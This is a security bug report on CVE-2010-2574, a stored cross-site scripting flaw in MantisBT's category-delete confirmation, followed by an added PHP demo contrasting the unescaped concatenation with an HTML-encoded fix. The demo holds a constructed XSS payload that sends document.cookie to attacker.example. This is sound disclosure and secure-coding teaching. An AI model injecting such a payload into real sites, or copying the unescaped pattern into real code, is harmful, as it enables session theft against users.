Bug 633003 (CVE-2010-2574)
| Field | Value |
|---|---|
| Summary | CVE-2010-2574 Mantis: XSS in Add Category action. |
| Product | [Other] Security Response |
| Reporter | Jan Lieskovsky <jlieskov> |
| Component | vulnerability |
| Assignee | Red Hat Product Security <security-response-team> |
| Status | CLOSED ERRATA |
| QA Contact | |
| Severity | low |
| Docs Contact | |
| Priority | low |
| Version | unspecified |
| CC | d, giallu, sven |
| Target Milestone | --- |
| Keywords | Security |
| Target Release | --- |
| Hardware | All |
| OS | Linux |
| Whiteboard | |
| Fixed In Version | |
| Doc Type | Bug Fix |
| Doc Text | |
| Story Points | --- |
| Clone Of | |
| Environment | |
| Last Closed | 2010-12-17 23:46:31 UTC |
| Type | --- |
| Regression | --- |
| Mount Type | --- |
| Documentation | --- |
| CRM | |
| Verified Versions | |
| Category | --- |
| oVirt Team | --- |
| RHEL 7.3 requirements from Atomic Host | |
| Cloudforms Team | --- |
| Target Upstream Version | |
| Embargoed | |
| Bug Depends On | 634341 |
| Bug Blocks | |
Description
Jan Lieskovsky
2010-09-12 12:30:17 UTC
The relevant code part in the Mantis package, as shipped with Fedora releases 12 and 13, is slightly different:

BUILD/mantisbt-1.1.8/manage_proj_cat_delete.php:

```php
32 auth_reauthenticate();
33
34 $f_project_id = gpc_get_int( 'project_id' );
35 $f_category = gpc_get_string( 'category' );
```

i.e. instead of $f_category_id from [5], there is $f_category in the corresponding Fedora releases.

The subsequent code in Fedora is as follows:

```php
39 # Confirm with the user
40 helper_ensure_confirmed( lang_get( 'category_delete_sure_msg' ) .
41 '<br/>' . lang_get( 'category' ) . ': ' . $f_category,
42 lang_get( 'delete_category_button' ) );
43
44 category_remove( $f_project_id, $f_category );
```

On line 41 $f_category isn't sanitized either => discussion:
===========
1, if you think it should be, as it may be exploitable, please schedule Fedora mantis updates,
2, if you think it is not necessary (it is not exploitable), please provide arguments why you think so.

Thanks, Jan.

--
Jan iankko Lieskovsky / Red Hat Security Response Team

MantisBT 1.2.3 has been released to fix this XSS vulnerability.

This vulnerability isn't too severe because it requires the malicious user to have project manager permissions (this is typically a position of high trust within a MantisBT environment) to create a maliciously named category. Then a successful attack would require another (target) project manager/administrator to attempt to delete the maliciously named category. However, saying that, it is still important to fix even though exploitation would be difficult with MantisBT's use of HttpOnly cookie flags, CSRF tokens and other security features.

Version 1.2.3 release information:
http://sourceforge.net/mailarchive/message.php?msg_name=4C8FC573.3060900%40leetcode.net
http://sourceforge.net/projects/mantisbt/files/

Created mantis tracking bugs for this issue

Affects: fedora-all [bug 634341]

This is now fixed in all branches
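The pattern discussed in this bug, as an added example that is not part of the bug report and is not MantisBT's own code: a stored category name is concatenated verbatim into the confirmation message that helper_ensure_confirmed() renders as HTML, so a category named with markup is executed in the browser of whoever tries to delete it. The example reproduces that concatenation beside a hardened version that encodes the value for an HTML text context. lang_get_stub(), confirm_message_vulnerable(), confirm_message_hardened(), contains_raw_tag(), the two language strings and the malicious category name are all constructed for this demonstration; the hardened variant uses plain htmlspecialchars() so the script runs stand-alone, whereas the actual MantisBT fix uses the project's own escaping helpers in core/string_api.php and is not reproduced here.

```php
<?php
// Added example, not MantisBT code. Reproduces the unescaped concatenation
// from manage_proj_cat_delete.php and shows the class of fix: output-encode
// untrusted data for the context (HTML text) it is written into.

// Hypothetical stand-in for MantisBT's lang_get(); the strings are constructed.
function lang_get_stub(string $key): string {
    $strings = [
        'category_delete_sure_msg' => 'Are you sure you want to delete this category?',
        'category'                 => 'Category',
    ];
    return $strings[$key];
}

// Vulnerable: mirrors the shipped concatenation. Whatever a project manager
// typed as the category name is emitted as markup in the confirmation dialog.
function confirm_message_vulnerable(string $category): string {
    return lang_get_stub('category_delete_sure_msg') . '<br/>' .
           lang_get_stub('category') . ': ' . $category;
}

// Hardened: encode the untrusted value before it is concatenated into markup.
// ENT_QUOTES also covers the case where the same value is reused inside an
// attribute (for example a hidden form field on the confirmation page).
function confirm_message_hardened(string $category): string {
    $safe = htmlspecialchars($category, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return lang_get_stub('category_delete_sure_msg') . '<br/>' .
           lang_get_stub('category') . ': ' . $safe;
}

// Check used below: does the rendered HTML still contain a raw <tag> that
// originated in the category name?
function contains_raw_tag(string $html, string $tag): bool {
    return stripos($html, '<' . $tag) !== false;
}

// Constructed malicious category name, the kind of value a project manager
// could store through the category form and a second manager would later
// try to delete.
$f_category = 'Regressions<script>document.location='
            . '\'http://attacker.example/?c=\'+document.cookie</script>';

$vulnerable = confirm_message_vulnerable($f_category);
$hardened   = confirm_message_hardened($f_category);

echo "vulnerable: $vulnerable\n";
echo "hardened:   $hardened\n";
printf("raw <script> in vulnerable output: %s\n",
       contains_raw_tag($vulnerable, 'script') ? 'yes' : 'no');
printf("raw <script> in hardened output:   %s\n",
       contains_raw_tag($hardened, 'script') ? 'yes' : 'no');
```

Run it with `php` on the command line: the vulnerable line carries the `<script>` element intact, while the hardened line shows `&lt;script&gt;...` as inert text. Note that the HttpOnly flag and CSRF tokens mentioned in the thread limit what this particular cookie-stealing payload can do, but script running in the victim's page can still read the anti-CSRF token out of the DOM and submit forms on the victim's behalf, which is why the report treats the missing encoding as a bug to fix rather than something the other defences make irrelevant.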